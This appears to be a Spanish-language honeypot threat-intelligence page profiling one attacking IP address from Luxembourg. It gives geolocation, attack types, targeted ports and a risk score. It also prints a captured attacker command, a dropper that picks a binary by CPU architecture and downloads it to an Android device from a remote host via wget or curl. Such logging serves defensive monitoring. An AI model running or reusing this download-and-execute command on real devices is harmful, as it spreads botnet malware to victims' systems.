TROYANOSYVIRUS
Amenaza ActivaMEDIO

176.65.139.60

Pais de Origen🇱🇺 LU
Primera Deteccion29/3/2026
Ultima Actividad10/4/2026
ISPOffshore LC
🎯
63
Ataques Totales
🔌
4
Puertos
📡
4
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇱🇺 LU
Ciudad
Desconocida
ASN
AS214472
ISP
Offshore LC

Tipos de Ataque

yaml_exploit_honeypot
adb_honeypot
web_honeypot
tcp_trap

Puertos Atacados

80300030015555

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$pkill target; cd /data/local/tmp/; export PATH=$PATH:/data/local/tmp:/system/bin:/system/xbin; arch=$(uname -m); case $arch in *arm*) target=zyre.arm7;; *86|*64) target=zyre.x86;; *) target=zyre.arm7;; esac; if ! [ -f $target ]; then (wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || curl -o $target http://103.130.214.71:1212/$target 2>/dev/null || busybox wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || busybox curl -o $target http://103.130.214.71:1212/$target 14x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Evaluacion de Riesgo

55
/100
BajoMedioAltoCritico